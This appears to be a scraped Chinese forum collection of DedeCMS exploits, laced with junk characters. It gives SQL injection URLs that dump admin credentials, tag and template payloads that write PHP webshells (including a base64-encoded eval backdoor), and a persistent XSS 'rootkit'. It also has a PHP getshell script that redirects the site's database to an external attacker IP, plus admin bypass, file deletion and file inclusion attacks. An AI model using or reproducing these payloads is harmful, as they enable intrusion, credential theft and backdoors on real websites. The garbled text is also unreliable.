|
|
; |5 k" I1 v5 fDedecms 5.6 rss注入漏洞
. u$ `% Z+ }2 F# ~http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1& l4 L7 Z: r: p$ p5 u, z) l
n8 M6 X$ C4 ~. S! _$ }
5 y% r0 N/ \2 l( d! ]
( r$ m: o u6 L5 {; s
: h! N2 J1 ~4 l& y' D' K$ q, R! k
0 Y. N, q% b& x, S# W* b$ `, S
+ p/ q% h7 \: o
3 w: c+ G& J1 C1 e# J3 ?7 B
DedeCms v5.6 嵌入恶意代码执行漏洞
# J& _& L2 ~9 z% |注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
) d/ N) }* r- ^( T发表后查看或修改即可执行
: D* B' x: C" w, ^0 L" R( Pa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}5 W n. m( A3 I. k* f, |" y
生成x.php 密码xiao,直接生成一句话。6 l6 U0 _ q1 c5 C% q: ?
6 q) d1 b T- S3 w$ {" Z/ x' N( ^4 @: ~- D
6 {, q* ]! k' B& N
5 X+ |/ e' O1 E8 ^; V3 s
- N' y- B2 M" m p9 p4 `7 c0 u$ F6 A* D [0 D8 Y: V/ G
% I/ w: q: R) L4 q
) @( y/ G' I% I9 l! H/ B ?0 J
Dede 5.6 GBK SQL注入漏洞) @8 s; d4 q- G1 I
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
" w4 t2 z" S. p6 b1 q# Y; S( B2 A6 \http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe* |0 o! o" q$ R
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
: b6 |3 ^ `% k0 ?- j t( o& P9 _" X. O( \
7 X" ~1 e. q. V: _: E* ^
6 Z5 S, k* q- X% U5 w1 o9 Z" f, p( M4 A/ H9 N" H/ n
' O7 U0 j2 |% }" c' w0 s% [
8 a: E" O+ _- M5 _- h/ P5 q( k: W: b9 a/ z; p
; t& q7 J+ l% T, r4 U1 o- e" |- dDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞8 f% K7 K: K2 ?; T
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 6 `7 _0 N) [; E! `# R
# \2 U5 P. b- M) B c: R1 p+ T1 Q+ }: P4 u( Y1 `5 q% V; I+ w
a" [ R8 F7 T" d1 a" z
& r$ \$ r4 F2 ^4 x, z8 ]
: R$ h7 |4 C( X; L \
, v. D. F. f- DDEDECMS 全版本 gotopage变量XSS漏洞- X$ |& j! {3 w( `! o$ O. {
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ( Y# I1 V0 i% ?. P4 M( j6 Q' a$ J1 Q
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="6 f) H9 ^0 v. }8 s' Z b
; {8 P) ~- V+ E
) \: f& I: Y/ ^9 t5 O2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 % P$ s4 ?4 \5 E+ n
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda; h/ l4 e3 ^" m2 l: x
5 ^2 O. V* R. C
5 j% ]$ t; j6 I
http://v57.demo.dedecms.com/dede/login.php
1 C4 Z0 N- h5 _6 F3 z7 ~7 q1 r. b! t9 Y N
- w0 s2 ]$ G+ v, [% Z) M- vcolor=Red]DeDeCMS(织梦)变量覆盖getshell
( i, v. S! e5 ?& a( m#!usr/bin/php -w
3 x( Z, C# l, K( a$ `. E9 B<?php, e5 w# G5 o6 n+ y \2 ~5 |$ E5 Y
error_reporting(E_ERROR);8 n( v4 h% X2 ] M* j
set_time_limit(0);
) T) m) e# t4 S0 {2 V6 R: ?7 cprint_r('. a6 b/ I( ^9 ]
DEDEcms Variable Coverage
% a+ d; O: Y9 E7 k& L4 XExploit Author: www.heixiaozi.comwww.webvul.com! n1 N3 e6 P1 Z; i: Y$ F
);
- u" I" k2 u" x* G2 Secho "\r\n";2 E R! C% ]; B: }) A
if($argv[2]==null){: P$ C! Z! ~2 v! O5 k% }
print_r('
: d/ a% b" }& H1 s3 t0 M3 T+---------------------------------------------------------------------------+
$ U7 t" m& r) ?3 i3 r3 ]Usage: php '.$argv[0].' url aid path) c& r; M3 L" ~( ]- @. d; I2 S& I
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/2 z7 g/ i. R1 M0 o; D8 V8 Z$ J
Example:& j3 a$ b9 F2 }' R. p2 U2 e
php '.$argv[0].' www.site.com 1 old
) L4 s7 y( f! S4 P+---------------------------------------------------------------------------+
/ K4 T5 t8 Z0 Z');
/ c* Q, q+ @7 K" J9 H" cexit;
" L! x' x9 K, R( u* f4 w}
2 E; q9 K, |- A: i1 C7 P! G) [8 y$url=$argv[1];
0 D* ?& k: c) B2 T- c# N3 j0 m. f" _$aid=$argv[2];0 ^$ s0 g% U$ C% Z; G& r: _% a& J ]
$path=$argv[3];$ y9 g+ L# e& G3 c* x' ~9 G8 S& Z" R
$exp=Getshell($url,$aid,$path);; f6 _7 l$ G! F# C
if (strpos($exp,"OK")>12){
; ^' ?; r/ O1 p, e) recho ", O5 R; H3 u* ]9 s4 ?- @
Exploit Success \n";! [7 T2 e2 p) ~
if($aid==1)echo "
6 h7 N' N# {& AShell:".$url."/$path/data/cache/fuck.php\n" ;
# i3 F; r8 B, G$ `! G( h3 S) e
6 i Y& F+ n+ ]. q' @$ Z2 A' o; D! t2 B$ f; K- D
if($aid==2)echo "
9 [+ P H. m7 V- A2 G1 ~) z9 JShell:".$url."/$path/fuck.php\n" ;
2 T5 Y! N# ?4 h5 E' r! W" K) D# {8 V9 \3 @2 W
. O. h" o5 N; ?5 rif($aid==3)echo "5 M! N9 ]2 `4 m4 \4 J; t
Shell:".$url."/$path/plus/fuck.php\n";0 o9 {* a; G. K, l8 }
r0 d; c! `4 q
& f2 g8 d& t7 W+ [
}else{
' O, I2 r' B9 K( _, Iecho "
0 A: T( X3 p j5 x$ vExploit Failed \n";; v( Z7 P# [& [9 L; B5 D5 h
}6 Z: |- @3 _: M J
function Getshell($url,$aid,$path){% Z9 W4 w, ?! k! s, ~
$id=$aid;
( x0 Z3 S7 |0 f2 C" t# C$host=$url;7 N$ z$ O' T- h: I# Z
$port="80";# D1 ~) G0 I( c( D m
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
, l T* W" R- O& U$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";9 V3 [$ l% }; f4 ~, `( U0 {2 K1 C
$data .= "Host: ".$host."\r\n";
" K, E# d( Z( D. U$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";4 e" m/ q) O3 b, r3 s6 P0 R- E" j
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
4 |" [- S% @! L4 c$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";, {% y( w& ]& ~4 t* \- a! ^9 k/ \
//$data .= "Accept-Encoding: gzip,deflate\r\n";4 m3 A) F% u5 N* \+ O3 N$ p
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";* M6 i j7 u7 a
$data .= "Connection: keep-alive\r\n";7 o3 s& U' V5 n0 W. j5 r9 A m' q
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
% @# f7 p# e1 Z9 k( C- U6 V; _$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
2 h {' r! c% J$data .= $content."\r\n";
' i. d+ {! U" o9 K+ k* k$ j! d- J3 c8 m+ k# m$ock=fsockopen($host,$port);
2 J( A. I6 N3 Y! Tif (!$ock) {7 B$ t% l% k/ n* d( j4 d0 L, Z
echo "0 P$ x+ S$ \' r+ h, R; {% g2 ~9 m
No response from ".$host."\n";6 O- g3 s5 |, w6 l3 {5 `* u D
}
* M; W# `4 {, W2 g, Xfwrite($ock,$data);
2 h" q/ _ f) g$ n" Xwhile (!feof($ock)) {
O, l& \/ J; ? k5 V m$exp=fgets($ock, 1024);
( e% `0 t- z$ ^/ k& ^/ |9 B" `. Treturn $exp;
% ?/ f" @5 c3 M. Y' P4 T}9 @' T) V5 q2 |: ~0 M* I
} y/ a' d; l8 E! e s
7 @5 l4 k' u+ t5 |+ C$ ~8 C( p
1 }" [+ R( S" S5 u3 P?>
( r- a5 m, u9 T' t& a9 c! R! b& q, a2 J! u7 O
0 }* `9 _& N: x' U: f- I' c X& e1 B
9 Q3 X. O$ W* \# @6 U. p
5 u, v9 [3 Z, c
4 `; I) A& x$ I8 }
" m- Z6 o! u% O1 Q8 |5 T I" Z
8 a) e3 L3 {( ?- T: r0 x/ Q) Y4 Y% p8 c4 p, y+ H
( C6 h% S( t7 m- X% R8 t2 Z7 v
& i" Y* r7 b4 n. M- h1 JDedeCms v5.6-5.7 越权访问漏洞(直接进入后台): |7 C( V' f) h4 o2 k( `
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
5 t0 k3 O p7 u+ A
9 \: g' D6 s5 T8 z# s
& z( v5 ?/ y9 P; ~: Q把上面validate=dcug改为当前的验证码,即可直接进入网站后台
! A5 k- p G* k" h+ F% D% K
! b: u" g4 L5 q% Z8 D7 p, }+ z3 B0 [+ F: I; A5 Y: k# D! q2 f9 Z
此漏洞的前提是必须得到后台路径才能实现
$ x9 r; e- G0 ?! p3 @( ^. y: w$ p4 K' x& Z: H* z
i1 p+ Y) T3 x7 _3 C
( O2 P! Z3 Z& f y4 d
! o% E! J9 |6 a1 j2 Z0 ~
9 m- d, H& H1 Y: ]! _' G; A% s. S
3 `( o+ p$ n5 S* X1 N4 n8 ? g0 S: u
% e6 X3 o# n, U6 ]5 q$ G3 s F
0 M, S, O! q0 d: F2 x1 l/ c
" S8 l0 H* q' f& wDedecms织梦 标签远程文件写入漏洞
+ K" _- N& V( ^ O8 N+ }3 S- q前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');; j m/ S, L' M q) S
3 s" p0 p' ~6 Z$ J9 y. Z) i# S6 |, U
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 , A( S W- _3 P* L) F
<form action="" method="post" name="QuickSearch" id="QuickSearch">, g) {6 B( O8 j: j2 h
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />: F- Y$ O. ]3 X# D: R$ F5 @
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />! B% w4 C# O4 r5 Y: e% H; x0 ~
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
& `; `0 i K9 D* H+ t- f& w( s/ ?<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />7 N% _. r( J7 g! e. g& G
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
* M/ `( x+ A. ?8 D$ O- m* Y4 f$ H0 _<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />/ e& ^: H1 K5 {- p. [: Y1 d2 @
<input type="text" value="true" name="nocache" style="width:400">( E/ A! y) t, E G; a/ A4 _* w/ q
<input type="submit" value="提交" name="QuickSearchBtn"><br />7 H1 h. F( @% v ^# L" p
</form>, ?* h. c7 E. [
<script>7 Q8 Z( k% q! j) l
function addaction()
9 R* S7 Z' w" n9 `- W{
; ^* V7 O( m& q; w$ ^' vdocument.QuickSearch.action=document.QuickSearch.doaction.value;
. ?- k' O) R- Z% b/ [) \}
: M+ Z" ~; ~1 |- W( m</script>1 h* C$ `) i, ?3 k6 i/ T
" b3 e9 k" m1 ^+ f* f& d( A
0 n( S/ ?* }$ v9 B- T# Y
9 W( G7 p' I# g; E, Z$ H' O4 B( @" i! f# Z
" C3 U, C. P0 U- H6 Q
$ v, d& m$ T$ z* Q0 K; }
/ B% [" W9 R1 b# V
9 ]' S4 ?9 j' y- l
+ k+ A8 }# j: y
5 q0 y! D! @3 R" q$ U% y* N4 Y; SDedeCms v5.6 嵌入恶意代码执行漏洞
& Z/ l) B# d: K3 A1 K注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
6 j) s: d! H% O( d) ga{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
& G0 v- T* k- X6 |生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得* i0 C8 H/ c+ s" n! N
Dedecms <= V5.6 Final模板执行漏洞6 r& f1 K/ d3 N% b4 p/ x- n
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
7 y& x7 V5 }2 {% T9 W; V8 `3 xuploads/userup/2/12OMX04-15A.jpg0 @3 Z5 N0 d# c- i5 a, e
3 \3 k+ h; u2 o; J
# ~5 R8 d6 W- J0 m: t模板内容是(如果限制图片格式,加gif89a):
1 Z7 b. p8 q, ]+ \3 u{dede:name runphp='yes'}
1 Q# s! F7 t) v0 A$fp = @fopen("1.php", 'a');; p- b! r( ~4 u; D& y
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
. S, I; |' C: s' M. C9 B' H! O@fclose($fp);
0 {4 _0 u* X k4 v{/dede:name}
" H/ e9 T7 [, a2 修改刚刚发表的文章,查看源文件,构造一个表单:+ D/ D- T" f4 P9 `
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
1 P" r3 z8 b8 A V<input type="hidden" name="dopost" value="save" />2 _0 g8 Q, N; f8 V& v0 J, Q$ r/ a
<input type="hidden" name="aid" value="2" />8 a: o/ E( i% m) c
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />, m8 \/ r7 z5 [% R3 D: S
<input type="hidden" name="channelid" value="1" />
, U# D1 X/ J- k! N$ V% H<input type="hidden" name="oldlitpic" value="" />
+ ?& i7 V+ y- ?4 p) H, Z<input type="hidden" name="sortrank" value="1275972263" />" `2 e+ D) z. ]/ f/ l3 ?
& g6 j# ^/ ^6 s
1 ~# f1 ]0 r- [2 z2 O
<div id="mainCp">! N9 v$ g/ u0 u; t5 F8 m
<h3 class="meTitle"><strong>修改文章</strong></h3>
4 |. ?7 G- K$ B- G: E# t m* y( P
; H: N6 W. v1 a1 H
" v3 }- g8 K- R<div class="postForm">3 f# R' A+ O* g6 [' o
<label>标题:</label>
L2 w/ r! ~* j. q" H' m" E# H; J<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
# Z2 f `7 D5 \+ m. E I. W3 ^. \) k
; B i. P( C3 G; u* m, z<label>标签TAG:</label>
. ]' h& G1 p. r( F* ^" a. g$ C<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
6 m" Y: G' J6 E9 ]" a: g5 p7 \. D3 t7 w1 P! k6 y
/ J# _( F/ C7 E
<label>作者:</label>
- T- v7 ]: \9 B4 N7 v) B<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
- m1 I: a3 T+ ^! M; k6 f6 k
! l) ~8 d5 h7 z8 H( F! R, m0 I
$ E7 q" V' S6 h<label>隶属栏目:</label>$ F- Z$ V; [ J/ ]
<select name='typeid' size='1'>
+ ?3 ?: f `+ c<option value='1' class='option3' selected=''>测试栏目</option>
) v+ R$ p2 Q: ^1 q$ }: m# S7 }2 e+ }& j</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)/ q5 }. l- n7 }" N1 Z
5 q% [3 b* t o8 B
! X2 \+ J& {# @8 a, Z# ?' w" V/ F
<label>我的分类:</label>
$ W8 b6 \* ?6 n% Q/ e<select name='mtypesid' size='1'>
) O+ C% ]2 w; D4 x1 h<option value='0' selected>请选择分类...</option>
8 j/ @- U, w6 w0 {5 h<option value='1' class='option3' selected>hahahha</option>. |$ C+ P( Z6 B8 D. ~8 y2 Q5 ]6 E
</select>
# M4 z2 l: K1 e# c/ N# y8 d% B% \3 G+ o* q4 v4 F6 q) c
: k" X( ]1 Z) K, e<label>信息摘要:</label>
0 x6 h" p" S4 P8 t4 Y2 j<textarea name="description" id="description">1111111</textarea>
) W2 Q5 G! b0 ~5 |% |8 j Y(内容的简要说明)3 E( j; d0 R5 r' z* Q( {7 [
0 \) ~- x( `- x6 U' ]0 H6 [# A( Q3 K. b* J: r( ]5 Q7 m/ a" `3 }
<label>缩略图:</label>
5 w; e( u/ O" Z8 f<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
; p p' h, F+ _" @, ?
+ ]4 W$ `3 T7 L9 J% G1 L$ _% n! y' p5 n. ^
<input type='text' name='templet': `) }* H$ Y% S
value="../ uploads/userup/2/12OMX04-15A.jpg">
; @! c/ T/ S0 \( i# M2 Q7 z<input type='text' name='dede_addonfields'
" Z9 j# x$ l0 o% a. kvalue="templet,htmltext;">(这里构造)
$ Q6 b# U9 _8 `8 _7 _& z</div># x1 t( F- K4 Q
$ x& S$ j& l% j2 y8 K5 E" E; u
! }3 s t* `, q6 q" t1 ^' J<!-- 表单操作区域 -->& ?6 v: h5 u j: f7 G
<h3 class="meTitle">详细内容</h3>& W8 q! }' f* o
: `: }4 ~" v& d/ p. T; T7 u$ e& n. P! c/ n
<div class="contentShow postForm">
& Q1 y/ u, c3 B<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
: ~, h, { b0 @9 G2 X% b: H
0 ~0 s- O) ~7 }" d% O' C: }- L" ]5 J( l2 w3 {3 J
<label>验证码:</label>9 t' J9 ~0 y0 H
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
) v: W( L. b% [+ t<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
5 L9 s/ }$ L# N) V( ~" d! t+ }; C
) M# j0 F" n1 M6 Q, g, O
! S+ w8 }# A. L8 |# {4 ?; N<button class="button2" type="submit">提交</button>
+ _. o, D6 Y: Z5 p<button class="button2 ml10" type="reset">重置</button>5 f) N7 x8 d" z$ e
</div>7 ~1 K+ j6 A& h" I, Z
! r1 A7 ]/ |, t9 O4 I/ L8 a
9 U6 @% t4 H$ l O* h# R</div>
8 I+ r' d9 [+ { K" ^1 a& o, e% G5 b# i1 Z& h4 Z) ?: K
. k/ R' z9 q4 H
</form>
9 s" \9 @8 z! K
2 F9 X3 u; C% x7 K
# K. @$ T4 T# [; u. _# b; q N提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:: d$ B# P7 n1 y
假设刚刚修改的文章的aid为2,则我们只需要访问:! I" C( K! S2 p& c- i' V
http://127.0.0.1/dede/plus/view.php?aid=2$ W8 i$ B. l1 F% i* j2 v9 ^+ s! @: F
即可以在plus目录下生成webshell:1.php7 r8 L1 V# L. d( T
: c- R( T, Y E; U2 Q) b& _
' a$ a7 n- k# y3 Z
4 i' n& B1 R/ `
+ [) A8 K0 m4 b' l* d7 T8 p, w; X- i5 C Q E" n
- V4 a* H* ~6 Q9 d6 V1 b3 H1 b6 `6 M% h ~* @ ?$ t
m/ P/ a* p- l( d" b, x, t5 k
& D F' _* Q0 m" T- C
( O4 j( `6 J4 H4 d! Z/ Y. @: r! [4 n9 ^
$ r( r1 f; ^2 q' ^DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
$ `9 @- x# e3 {" ^Gif89a{dede:field name='toby57' runphp='yes'}
( n1 {! c l0 M: S0 F, }2 |phpinfo();
W M0 l$ d6 z0 H3 O{/dede:field}* R2 P+ R" L- Y
保存为1.gif! H! a7 ~( ^ [; v% \& V
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 9 a* {* n7 u& Y0 v
<input type="hidden" name="aid" value="7" />
- g5 ?3 H* ^- R0 h<input type="hidden" name="mediatype" value="1" />
5 M1 x7 B! K8 c+ }, X% T1 z<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
4 J4 N; T' ?! R& f<input type="hidden" name="dopost" value="save" /> & p. w% h9 k! c+ B% A
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
! ^' q4 z$ D3 Q' J+ P& ~( E- P! e2 l<input name="addonfile" type="file" id="addonfile"/>
- x8 @5 f- P3 T( v5 r# Q<button class="button2" type="submit" >更改</button> / N' U% g6 V1 ?- A- F5 j7 w5 Z
</form> 2 {' C- _! N: V, u& j! U
}& l `. Z9 b% k" P( P
% E! y' Q, z8 ?3 d9 h, x
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif4 {" k# }) o% ]* e* s
发表文章,然后构造修改表单如下:7 K/ F K/ a* j+ _. u+ n& B* m& v
* D j) x& Z' y* e, ?: X( ^
+ t! W) f" G6 ]9 i1 f<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
- |" y8 b! S6 ?& j( q# g! @<input type="hidden" name="dopost" value="save" /> . l! N: R8 }" ^% L
<input type="hidden" name="aid" value="2" />
- l% I S( u! q8 H" @6 s<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
8 ~0 K: X% ?. i" y1 \4 d<input type="hidden" name="channelid" value="1" /> 5 G+ w1 g/ ]" W- v" ~) k
<input type="hidden" name="oldlitpic" value="" />
# k* P, R. n$ V1 W<input type="hidden" name="sortrank" value="1282049150" /> & J+ {- [7 Q* D/ V5 } t
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
" U0 W0 V' R9 n" T. W9 O<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
( |; |* ~8 s! X% x' d+ |<select name='typeid' size='1'>
7 @2 [- f! E- a* Q: Q3 L* A<option value='1' class='option3' selected=''>Test</option>
4 F7 Q0 r* k% A" ] r7 \) e<select name='mtypesid' size='1'> / u' d. _3 q+ J; `
<option value='0' selected>请选择分类...</option>
% {/ F6 K6 i# t- ~. f0 H3 @ |<option value='1' class='option3' selected>aa</option></select> 6 O3 x, s C, v. f9 R
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
' l5 w1 y7 u { g# K H4 b<input type='hidden' name='dede_addonfields' value="templet"> ! A3 [; j" o0 s) m+ q, \
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
" i9 a9 O# V' D4 h2 \7 E<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> - b1 a f; e* E
<button class="button2" type="submit">提交</button> , ]$ d ~; r2 w& H0 Z% w! k
</form>7 d* A4 ]) Y/ B) ]& a
( ~, J0 P6 t. z+ U
J8 G: i9 ]$ [( Y. m
' z7 Q/ S" m# a6 }3 i2 ~6 o: ^% d# V Y8 }2 A: U
, R' k, F5 P8 d2 F' r/ H% S2 W
( H3 R. v" H; Q3 z/ ]' A. n
( z3 t9 Y/ D, p x9 k. ^4 l2 L4 V: t/ O
/ {9 j* \; D* \1 \
2 B* q: b, I: b1 u6 j3 t5 H
2 U; t$ I% `; b: t0 ~; p
3 l* o& A/ \. `6 {2 C$ d5 j织梦(Dedecms)V5.6 远程文件删除漏洞# Q7 X& {" ]; a2 J
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
. k( ?& j6 s6 S. A2 E1 T. d3 |( b1 |! Y" f0 d
. n$ h+ ?/ }+ T9 X7 R2 I% |2 B3 P+ b" b) P# `6 O
+ O9 Z7 I1 g; A) x( O" s
% h$ b% } ^, p) i( {$ K
# F$ ~! |) u1 w3 h' {1 j& F5 ~( c3 m5 \
7 B& |! B3 D5 u) C6 T ~5 t9 b% p0 d. b2 y) }" q9 H
0 r# A7 w n3 X. c& ~9 j+ K织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
6 R, V8 C4 L! K9 \$ X" @1 Ghttp://www.test.com/plus/carbuya ... urn&code=../../) i6 _: F% y4 A2 W
$ {5 c- {! l H# E. G+ t0 _* R
9 h$ }: Z/ u" F3 _4 S
" U9 T' y" s- i7 {3 A
+ z6 g' E7 w, f: C3 |- n G: l) b2 W8 N$ B. n8 Y9 t% z8 E# G
8 ^4 |3 C& W# M# O3 L' Z6 l9 j
7 J, Q g, Y: J |% s' b7 N8 G2 \/ D& e6 C
* Q4 s/ [. U1 F8 b' C! P& e6 z$ F
t' ^9 q0 ^( D3 ]DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
0 `/ j- B$ B1 Dplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
0 l3 j4 L/ O7 P7 y. ~' W- O- x, P$ q* q密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
7 `) I+ p. y9 A# d, _. Q
, v1 @) | a3 W5 D5 j* p4 `' c& I& t& @# B) W3 p
/ ]# }% w* b: Q( ~' G2 Q9 ]6 N+ m# K1 ^$ Z2 h9 Y G
. t5 W; `6 e2 i0 ~
, N! R& O2 P; b) l% B0 A$ E
( d6 W, R9 O, g3 M
! T/ M' x7 J0 V1 g0 @2 a. Y- r) u6 F4 Y
& U4 e4 _" B3 u; T/ w# E0 @
0 F0 R/ h' ?* W" ?
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞 C( A" N% x) }
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
2 y& M4 s: x$ s2 r- ~5 t0 U4 \4 V
9 u- q9 i, b$ W5 g7 c- a4 Q7 ^# v6 U& o% f
' K2 u$ t6 Z7 F$ b) p
& }2 a6 ?6 ?% ]8 \) u
% s9 M/ _9 h' S6 }& a3 p% M
% B2 c4 N( b# Q2 S5 ]9 }6 J$ o: R" N; x
# F6 U6 }8 E0 f' C0 B
2 Y6 F$ n! N( Y* `% y7 n- g( O) a) B6 B# m3 L+ ?; P
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞) H. h. f4 ]+ m+ p! L# r
<html>6 j6 X7 U+ p2 ~& h+ Y
